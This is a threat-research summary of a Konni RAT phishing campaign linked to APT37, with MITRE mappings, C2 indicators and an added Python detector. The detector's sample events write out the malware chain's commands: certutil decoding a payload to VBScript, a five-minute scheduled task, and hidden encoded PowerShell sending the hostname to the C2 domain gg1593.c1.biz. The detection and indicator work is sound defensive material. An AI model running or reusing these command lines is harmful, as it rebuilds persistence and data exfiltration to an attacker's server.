Meeting the “Ministrer” | Fortinet Blog

Fortinet’s FortiGuard Labs uncovered a Russian-language phishing email designed to deploy the Konni RAT, linked to APT37, that establishes persistence and C2 communications. The attack uses a Donbass.zip attachment containing a decoy PowerPoint file and a malicious macro chain that drops and executes VBScript on Windows systems.
#Konni #APT37

Keypoints

  • The phishing email targets Windows users and is tied to Konni, a remote administration tool associated with APT37, a DPRK-aligned group.
  • The email spoofs the Consulate General of Russia in Shenyang and uses a thread-like subject to appear credible.
  • The Zip attachment named “Donbass.zip” contains a decoy PowerPoint and a malicious add-in file (Donbass.ppam).
  • The Donbass.ppam macro uses a command prompt to drop base64 data into oup.dat and then decodes it to oup.vbs via Certutil.
  • oup.vbs creates a scheduled task “Office Updatev2.2” to ensure persistence and executes a base64 PowerShell command to reach a C2 server.
  • The PowerShell stage attempts to collect environment information and connect to a C2 domain/IP (gg1593.c1.biz / 185.176.43.106), though the C2 was not responsive at analysis time.
  • Fortinet protections include VBA/Agent.AIF!tr detections, Web Filtering blocks, and phishing-awareness trainings like FortiPhish and NSE modules.

MITRE Techniques

  • [T1566.001] Phishing – Attachment – The email carries a Donbass.zip attachment to lure the user into deploying malware. “Attached to the email is a Zip archive, “Donbass.zip”.”
  • [T1059.003] Command and Scripting Interpreter – Command Prompt – The macro uses a command prompt to deposit base64 data. “Using a command prompt, it then deposits a large block of base 64-encoded text into a file called “oup.dat”.”
  • [T1132.001] Data Encoding – Base64 decoding via Certutil – Base64 data is decoded to oup.vbs using Certutil. “the encoded text within “oup.dat” is then decoded to “oup.vbs”.”
  • [T1059.001] PowerShell – PowerShell command execution – A base64-encoded PowerShell command is executed. “The PowerShell command attempts to provide some environment information (e.g., machine name) and connect to a URL at gg1593[.]c1[.]biz.”
  • [T1053.005] Scheduled Task – Persistence through scheduled task – A task named “Office Updatev2.2” runs every 5 minutes. “create a scheduled task called “Office Updatev2.2”. The purpose of this task is to continually run “oup.vbs” once every 5 minutes.”
  • [T1071.001] Web Protocols – C2 over HTTP – The PowerShell stage connects to a C2 URL. “connect to a URL at gg1593[.]c1[.]biz.”
  • [T1082] System Information Discovery – Environment information gathering – The PowerShell step collects info like machine name. “some environment information (e.g., machine name)…”
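As an added example that is not part of the Fortinet post, the following Python detector turns the chain above into process-creation checks and runs them over constructed sample events. The task name, file names and C2 hosts come from the post; the event format, the assumption that the VBScript registers its task through schtasks.exe, and the contents of the encoded PowerShell are assumptions made for the sample.

```python
import base64
import re

# Constructed sample process-creation events (not from the Fortinet post).
# They mirror the described chain: PowerPoint add-in -> cmd.exe writes oup.dat ->
# certutil decodes it to oup.vbs -> scheduled task -> encoded PowerShell to the C2.
SAMPLE_EVENTS = [
    {"parent": "POWERPNT.EXE", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c echo <base64 blob> > "%TEMP%\\oup.dat"'},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -decode %TEMP%\\oup.dat %TEMP%\\oup.vbs"},
    {"parent": "wscript.exe", "image": "schtasks.exe",  # assumed: task created via schtasks
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn "Office Updatev2.2" /tr "wscript %TEMP%\\oup.vbs"'},
    {"parent": "wscript.exe", "image": "powershell.exe",  # script body is constructed
     "cmdline": "powershell -nop -w hidden -enc " + base64.b64encode(
         "$h=hostname; Invoke-WebRequest http://gg1593.c1.biz/?n=$h".encode("utf-16le")).decode()},
    {"parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil -verify signed.cer"},  # benign use, must not fire
]

C2_HOSTS = {"gg1593.c1.biz", "185.176.43.106"}   # from the post
TASK_NAME = "office updatev2.2"                   # from the post, lower-cased
OFFICE_APPS = {"POWERPNT.EXE", "WINWORD.EXE", "EXCEL.EXE"}

def decode_encoded_powershell(cmdline):
    """Return the decoded script if cmdline carries -enc/-EncodedCommand, else None.
    PowerShell expects base64 of a UTF-16LE string, so decode it the same way."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the list of finding labels that apply to one process-creation event."""
    img, cmd = event["image"].lower(), event["cmdline"]
    low, hits = cmd.lower(), []
    if event["parent"].upper() in OFFICE_APPS and img == "cmd.exe":
        hits.append("office_app_spawned_cmd")
    if img == "certutil.exe" and "-decode" in low and low.rstrip().endswith(".vbs"):
        hits.append("certutil_decode_to_vbs")
    if img == "schtasks.exe" and "/create" in low and (
            TASK_NAME in low or (".vbs" in low and "/sc minute" in low)):
        hits.append("scheduled_task_runs_vbs")
    decoded = decode_encoded_powershell(cmd) if img in ("powershell.exe", "pwsh.exe") else None
    if decoded and any(h in decoded.lower() for h in C2_HOSTS):
        hits.append("encoded_powershell_to_known_c2")
    return hits

def scan(events):
    """Return (image, findings) for every event that triggers at least one check."""
    return [(e["image"], h) for e in events if (h := classify(e))]
```

The certutil and scheduled-task checks are the ones worth keeping after the C2 changes, since the post's decode-to-.vbs and five-minute task pattern does not depend on the domain.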

Indicators of Compromise

  • [Domain] C2 domain – gg1593.c1.biz
  • [IP] C2 IP – 185.176.43.106
  • [File name] Donbass.zip, Donbass.ppam – infection-related archive and add-in used in the phishing chain

Read more: https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware